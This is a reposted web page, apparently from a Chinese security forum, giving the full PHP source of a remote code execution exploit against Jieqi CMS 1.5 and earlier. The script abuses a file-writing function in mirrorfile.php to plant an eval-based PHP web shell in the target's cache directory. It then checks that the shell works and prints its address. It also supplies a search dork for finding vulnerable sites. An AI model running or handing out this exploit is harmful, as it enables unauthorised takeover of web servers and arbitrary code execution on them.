Jieqi cms v1.5 remote code execution exploit
|
来源:http://bbs.wolvez.org 作者:flyh4t 发布时间:2009-02-02
|
|
<?php print_r(' +---------------------------------------------------------------------------+ Jieqi cms <= 1.5 remote code execution exploit by Flyh4t mail: flyh4t@hotmail.com team: http://www.wolvez.org dork: "技术支持:杰奇网络" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to jieqi cms Example: php '.$argv[0].' localhost / +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&action=writetofile&content='; $shell = 'http://'.$host.$path.'cache/flyh4t.php'; $cmd = urlencode("<?php @eval(\$_POST[wolvez]);?>test"); $str = file_get_contents($url.$cmd); if ( file_get_contents($shell) == 'test') exit("Expoilt Success!\nView Your shell:\t$shell\n"); else exit("Exploit Failed!\n"); ?>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|